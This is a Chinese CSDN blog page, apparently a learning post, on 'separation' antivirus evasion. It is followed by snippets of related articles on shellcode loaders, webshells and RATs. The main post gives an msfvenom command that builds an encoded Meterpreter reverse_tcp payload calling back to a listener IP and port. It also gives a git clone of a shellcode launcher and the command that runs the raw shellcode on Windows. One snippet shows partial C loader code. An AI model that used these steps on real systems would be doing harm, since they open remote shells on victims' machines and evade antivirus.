免杀马学习(分离免杀)

最新推荐文章于 2024-03-17 20:51:27 发布

Cllmsy_K

最新推荐文章于 2024-03-17 20:51:27 发布

阅读量315

点赞数

分类专栏：免杀学习与对抗文章标签：学习

本文链接：https://blog.csdn.net/weixin_47533648/article/details/129114682

版权

免杀学习与对抗专栏收录该内容

7 篇文章 2 订阅

订阅专栏

2023年将会持续于B站、CSDN等各大平台更新，可加入粉丝群与博主交流:838681355，为了老板大G共同努力。
【商务合作请私信或进群联系群主】

一、原理

原理：分离免杀，用法C#语言shellcode图片加载
下载：
git clone https://github.com/clinicallyinane/shellcode_launcher/

二、操作

Msfvenom生成raw格式的shellcode：
msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=3333  -f raw -o shellcode.raw

在这里插入图片描述

免杀分析：raw本身是没啥危害的，但是shellcode加载器必须进行免杀才能上传。
WIN上：shellcode_launcher.exe –I shell.raw

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Cllmsy_K

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
免杀马学习(分离免杀)

免杀马之分离免杀学习
复制链接

扫一扫

专栏目录

一只php免杀马.php

10-30

最新免杀php变种一句话，亲测过啊D，不知道什么时候加入特征库报毒

webshell-venom-master一些免杀马

04-13

Webshell Venom Master中的免杀马是指设计时考虑了这些技术，以提高其在目标环境中的生存能力。 3. **编程语言**：Webshell Venom Master包含了多种编程语言的Webshell示例，如PHP、Python、ASP、JSP等。每种语言都...

参与评论您还未登录，请先登录后发表或查看评论

Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)

xf555er的博客

05-24

2792

本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载，以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程，并提供了相关的C++代码。为了避免被杀毒软件检测，利用动态API调用和lazy_importer项目进行代码优化。其次，文章讨论了如何通过远程URL加载shellcode，也提供了相应的实现代码。

免杀-Shellcode分离隐藏&C++

qq_45087791的博客

02-27

1438

Shellcode分离隐藏-让杀毒找不到。离免杀包含对特征和行为的分离两个维度，把shellcode从放在程序转移到加载进内存，把整块的ShellCode通过分块传输的方法上传然后再拼接，这些体现了基本的"分离"思想。

【免杀】分离免杀（python）

zhangshuaiijie的博客

06-28

693

shellcode是一段用于利用软件漏洞的有效负载代码，以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器，用什么语言来写都可以思路就是将shellcode和loader分离开来，用loader加载存在于普通文件中的shellcode。

免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

xiaoheizi的博客

09-24

1365

无文件落地&分离拆分其实就是内存免杀，内存免杀是将shellcode直接加载进内存，由于没有文件落地，因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好，在申请内存时一般采用渐进式申请一块可读写内存，在运行时改为可执行，在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度，把shellcode从放在程序转移到加载进内存，把整块的shellcode通过分块传输的方法上传然后再拼接，这些体现了基本的”分离“思想。3.因为实战的时候不需要加密，所以就代码中的加密代码剔除，减少特征。

CobaltStrike木马免杀代码篇之python反序列化分离免杀(一)

xf555er的博客

11-21

1790

本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化免杀所需用到的相关函数和库

第六十六课：借助aspx对payload进行分离免杀1

08-03

靶机背景：msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler

DuckMemoryScan：检测绝大部分所谓的内存免杀马

03-04

DuckMemoryScan一个简单寻找包括不限于iis劫持，无文件木马，shellcode免杀后门的工具，由huoji花了1天编写，编写时间2021-02-24 ！！！！！！！！！！！！！！！！！！！！！！！！！，不要执行32位编译！！！ !!!...

pcshare个人专版免杀主流杀软到6月28号

07-24

【标题】"pcshare个人专版免杀主流杀软到6月28号" 描述了一款针对个人用户特别定制的PcShare软件版本，该版本特别优化了免杀功能，即能够避免被主流的杀毒软件检测到，至少在发布时能够成功绕过瑞星杀毒软件的查杀...

msf shellcode分离免杀技术

good good study

05-27

1916

一般的shellcode是直接放在程序里面执行，分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀

红队攻防之exe文件签名免杀

热门推荐

CSDN

08-10

1万+

众所周知，目前的杀毒软件的杀毒原理主要有三种方式，一种基于特征，一种基于行为，一种基于云查杀，其中云查杀的一些特点基本上也可以概括为特征码查杀，不管是哪一种杀毒软件，都会检查PE文件头，尤其是当程序越大时，越容易被查杀。

C实现分离免杀

春日野穹

02-28

2376

前期准备 1.编译好mian.exe，源码如下 #include <stdio.h> #include <windows.h> int main(int argc,char* argv[]) { //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)

认识分离免杀

weixin_50217210的博客

10-16

WinHttpOpenRequest //通过hconnect句柄创建一个hRequest句柄，用于发送数据与读取从服务器返回的数据。WinHttpReceiveResponse //发送请求成功则准备接收服务器的response。WinHttpConnect //通过上述句柄连接到服务器，需要指定服务器ip和端口号。两种思路：一是从socket连接加载，客户端连接c2端口，返回shellcode。WinHttpOpen //初始化一个winhttp-session句柄，c++文件流多复习复习。

ShellCode免杀的一些方法

qq_68890680的博客

06-26

588

申请内存空间：VirtualAlloc（在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2（进程注入：在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零）、VirtualAllocEx（进程注入：在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式：基础加载，纤程加载，远程加载。

Python木马分离免杀（下载分离型）

lunito的博客

04-27

961

msf生成python的shellcode木马简单分离免杀思路

Ghost RAT DarkComet PoisonIvy NetWire BlackShades njRAT XtremeRAT NanoCore RAT Quasar RAT AsyncRAT这些免杀马的代码举例说明介绍

05-18

这些 RAT 工具的免杀能力通常是通过以下方式实现的： 1. 使用加壳技术：这些 RAT 工具经常使用加壳技术来隐藏其真实性质，使其在被杀毒软件扫描时难以识别。 2. 使用虚拟化技术：这些 RAT 工具可以使用虚拟化技术...